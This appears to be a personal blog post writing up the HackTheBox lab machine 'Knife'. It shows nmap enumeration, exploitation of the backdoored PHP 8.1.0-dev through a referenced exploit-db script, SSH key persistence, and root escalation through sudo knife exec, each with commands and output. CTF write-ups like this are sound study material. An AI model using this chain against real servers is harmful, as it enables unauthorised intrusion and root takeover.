<!DOCTYPE html><html lang="en-US" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Knife" /><meta property="og:locale" content="en_US" /><meta name="description" content="Enumeration NMAP Scan Apache 2.4.41 (Port 80) and OpenSSH (Port 22) are running on this machine. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $sudo nmap -sC -sV 10.10.10.242 Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.056s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Emergent Medical Idea Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Website Upon visiting the website, not much is remarkable. No form, no hidden folders/files or anything else. Vulnerability The running services do not seem to be vulnerable, so lets check the PHP version. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $nmap -sC -sV 10.10.10.242 --script=http-php-version Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.065s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-php-version: Version from header x-powered-by: PHP/8.1.0-dev |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Bingo - PHP 8.1.0-dev - that looks promising. Exploitation PHP verion 8.1.0-dev was released with a backdoor in March 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. With a POC script from exploit-db we get access to a shell. ``` bash ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $python 49933.py Enter the full host url: http://10.10.10.242/" /><meta property="og:description" content="Enumeration NMAP Scan Apache 2.4.41 (Port 80) and OpenSSH (Port 22) are running on this machine. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $sudo nmap -sC -sV 10.10.10.242 Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.056s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Emergent Medical Idea Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Website Upon visiting the website, not much is remarkable. No form, no hidden folders/files or anything else. Vulnerability The running services do not seem to be vulnerable, so lets check the PHP version. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $nmap -sC -sV 10.10.10.242 --script=http-php-version Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.065s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-php-version: Version from header x-powered-by: PHP/8.1.0-dev |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Bingo - PHP 8.1.0-dev - that looks promising. Exploitation PHP verion 8.1.0-dev was released with a backdoor in March 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. With a POC script from exploit-db we get access to a shell. ``` bash ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $python 49933.py Enter the full host url: http://10.10.10.242/" /><link rel="canonical" href="/posts/knife/" /><meta property="og:url" content="/posts/knife/" /><meta property="og:site_name" content="ox7f" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-06-04T22:20:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Knife" /><meta name="twitter:site" content="@ox7f2" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2021-06-14T21:29:29+02:00","datePublished":"2021-06-04T22:20:00+02:00","description":"Enumeration NMAP Scan Apache 2.4.41 (Port 80) and OpenSSH (Port 22) are running on this machine. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $sudo nmap -sC -sV 10.10.10.242 Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.056s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Emergent Medical Idea Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Website Upon visiting the website, not much is remarkable. No form, no hidden folders/files or anything else. Vulnerability The running services do not seem to be vulnerable, so lets check the PHP version. 1 2 3 4 5 6 7 8 9 10 11 12 ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $nmap -sC -sV 10.10.10.242 --script=http-php-version Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 18:47 CEST Nmap scan report for 10.10.10.242 Host is up (0.065s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-php-version: Version from header x-powered-by: PHP/8.1.0-dev |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Bingo - PHP 8.1.0-dev - that looks promising. Exploitation PHP verion 8.1.0-dev was released with a backdoor in March 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. With a POC script from exploit-db we get access to a shell. ``` bash ┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife] └──╼ $python 49933.py Enter the full host url: http://10.10.10.242/","headline":"Knife","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/knife/"},"url":"/posts/knife/"}</script><title>Knife | ox7f</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/style.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="https://avatars.githubusercontent.com/u/77727665?v=4" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">ox7f</a></div><div class="site-subtitle font-italic">will post my write-ups and notes here</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/ox7f" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/ox7f2" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['ox7f','protonmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Knife</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Knife</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> 127 </span> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Fri, Jun 4, 2021, 10:20 PM +0200" prep="on" > Jun 4, 2021 <i class="unloaded">2021-06-04T22:20:00+02:00</i> </span></div><div> <span> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Jun 14, 2021, 9:29 PM +0200" prefix="Updated " > Jun 14, 2021 <i class="unloaded">2021-06-14T21:29:29+02:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="673 words">3 min</span></div></div><div class="post-content"><h1 id="enumeration">Enumeration</h1><h2 id="nmap-scan">NMAP Scan</h2><p>Apache 2.4.41 (Port 80) and OpenSSH (Port 22) are running on this machine.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife]
└──╼ <span class="nv">$sudo</span> nmap <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.10.242
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-06-04 18:47 CEST
Nmap scan report <span class="k">for </span>10.10.10.242
Host is up <span class="o">(</span>0.056s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><h2 id="website">Website</h2><p>Upon visiting the website, not much is remarkable. No form, no hidden folders/files or anything else. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/knife_box.png#center" alt="" /></p><h2 id="vulnerability">Vulnerability</h2><p>The running services do not seem to be vulnerable, so lets check the PHP version.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife]
└──╼ <span class="nv">$nmap</span> <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.10.242 <span class="nt">--script</span><span class="o">=</span>http-php-version
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-06-04 18:47 CEST
Nmap scan report <span class="k">for </span>10.10.10.242
Host is up <span class="o">(</span>0.065s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-php-version: Version from header x-powered-by: PHP/8.1.0-dev
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>Bingo - <code class="language-plaintext highlighter-rouge">PHP 8.1.0-dev</code> - that looks promising.</p><h1 id="exploitation">Exploitation</h1><p><a href="https://flast101.github.io/php-8.1.0-dev-backdoor-rce/">PHP verion 8.1.0-dev</a> was released with a backdoor in March 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. With a <a href="https://www.exploit-db.com/exploits/49933">POC script</a> from exploit-db we get access to a shell.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife]
└──╼ <span class="nv">$python</span> 49933.py 
Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/
<span class="nv">$ </span><span class="nb">whoami
</span>james
<span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"ssh-rsa AAAAB3Nza...6ZMeJjY1iiRM= x7f@pWnbox"</span> <span class="o">&gt;&gt;</span> ~/.ssh/authorized_keys
</pre></table></code></div></div><p>Working with this shell is kinda wack. Let’s add our ssh public key to the authorized_keys file. By doing so we can now ssh into the machine with the user James - without being asked for a password.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>┌─[x7f@pWnbox]─[/ctf/hackthebox/machines/knife]
└──╼ <span class="nv">$ssh</span> james@10.10.10.242
Welcome to Ubuntu 20.04.2 LTS <span class="o">(</span>GNU/Linux 5.4.0-72-generic x86_64<span class="o">)</span>
...
james@knife:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
</pre></table></code></div></div><p>We got the first flag, now it’s time for the second one.</p><h1 id="root">Root</h1><p>Before running automated scripts, let’s run <code class="language-plaintext highlighter-rouge">sudo -l</code> and check what we can run as root.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>james on knife:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User james may run the following commands on knife:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/knife
</pre></table></code></div></div><p>Lets run it and check what we can do with it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">sudo </span>knife
ERROR: You need to pass a sub-command <span class="o">(</span>e.g., knife SUB-COMMAND<span class="o">)</span>

Usage: knife sub-command <span class="o">(</span>options<span class="o">)</span>
    <span class="nt">-s</span>, <span class="nt">--server-url</span> URL             Chef Infra Server URL.
        <span class="nt">--chef-zero-host</span> HOST        Host to start Chef Infra Zero on.
        <span class="nt">--chef-zero-port</span> PORT        Port <span class="o">(</span>or port range<span class="o">)</span> to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports <span class="k">until </span>one works.
    <span class="nt">-k</span>, <span class="nt">--key</span> KEY                    Chef Infra Server API client key.
        <span class="nt">--</span><span class="o">[</span>no-]color                 Use colored output, defaults to enabled.
    <span class="nt">-c</span>, <span class="nt">--config</span> CONFIG              The configuration file to use.
        <span class="nt">--config-option</span> <span class="nv">OPTION</span><span class="o">=</span>VALUE Override a single configuration option.
        <span class="nt">--defaults</span>                   Accept default values <span class="k">for </span>all questions.
    <span class="nt">-d</span>, <span class="nt">--disable-editing</span>            Do not open EDITOR, just accept the data as is.
    <span class="nt">-e</span>, <span class="nt">--editor</span> EDITOR              Set the editor to use <span class="k">for </span>interactive commands.
    <span class="nt">-E</span>, <span class="nt">--environment</span> ENVIRONMENT    Set the Chef Infra Client environment <span class="o">(</span>except <span class="k">for in </span>searches, where this will be flagrantly ignored<span class="o">)</span><span class="nb">.</span>
        <span class="nt">--</span><span class="o">[</span>no-]fips                  Enable FIPS mode.
...
<span class="k">**</span> EXEC COMMANDS <span class="k">**</span>
knife <span class="nb">exec</span> <span class="o">[</span>SCRIPT] <span class="o">(</span>options<span class="o">)</span>
...
</pre></table></code></div></div><p>Great, we can run scripts - now we just need to find out what kind of scripts are accepted.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">cat</span> /usr/bin/knife
<span class="c">#!/opt/chef-workstation/embedded/bin/ruby --disable-gems</span>
<span class="c">#--APP_BUNDLER_BINSTUB_FORMAT_VERSION=1--</span>
require <span class="s2">"rubygems"</span>
</pre></table></code></div></div><p>Looks like Ruby. So let’s try to run a Ruby script.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"system('cat /root/root.txt');"</span> <span class="o">&gt;</span> root.rb
james@knife:~<span class="nv">$ </span><span class="nb">sudo </span>knife <span class="nb">exec </span>root.rb
</pre></table></code></div></div><p>We got the second flag and we are done here. ٩(◕‿◕｡)۶</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/machine/'>machine</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Knife - ox7f&url=/posts/knife/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Knife - ox7f&u=/posts/knife/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/stylish+/">Stylish+</a><li><a href="/posts/knife/">Knife</a><li><a href="/posts/armageddon/">Armageddon</a><li><a href="/posts/caas/">Caas</a><li><a href="/posts/pcalc/">Pcalc</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/cyberapocalpyse2021/">cyberapocalpyse2021</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/bcactf3/">bcactf3</a></div></div></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/armageddon/"><div class="card-body"> <span class="timeago small" > May 1, 2021 <i class="unloaded">2021-05-01T11:37:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Armageddon</h3><div class="text-muted small"><p> Enumeration NMAP Scan This machines has only two open ports (22 and 80) - we see that Apache 2.4.6 is serving Drupal 7 and PHP 5.4.16 - both are outdated and most likely vulnerable. ┌─[x7f@pWnbox]─...</p></div></div></a></div><div class="card"> <a href="/posts/stylish+/"><div class="card-body"> <span class="timeago small" > Jun 6 <i class="unloaded">2022-06-06T10:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Stylish+</h3><div class="text-muted small"><p> Overview Stylish+ is a Fastify web application that allows you to create CSS themes and present them to a bot. You also get the source code of the application to review it and identify any security...</p></div></div></a></div><div class="card"> <a href="/posts/pcalc/"><div class="card-body"> <span class="timeago small" > Apr 25, 2021 <i class="unloaded">2021-04-25T18:15:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Pcalc</h3><div class="text-muted small"><p> This challenge contains code execution but with a little twist. We can’t use letters and those characters '"\[]. So we have to somehow bypass a filter. For more information about this sort of thing...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/armageddon/" class="btn btn-outline-primary" prompt="Older"><p>Armageddon</p></a> <a href="/posts/stylish+/" class="btn btn-outline-primary" prompt="Newer"><p>Stylish+</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('.post-content img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/ox7f2">127</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">stayin' alive.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/cyberapocalpyse2021/">cyberapocalpyse2021</a> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/bcactf3/">bcactf3</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
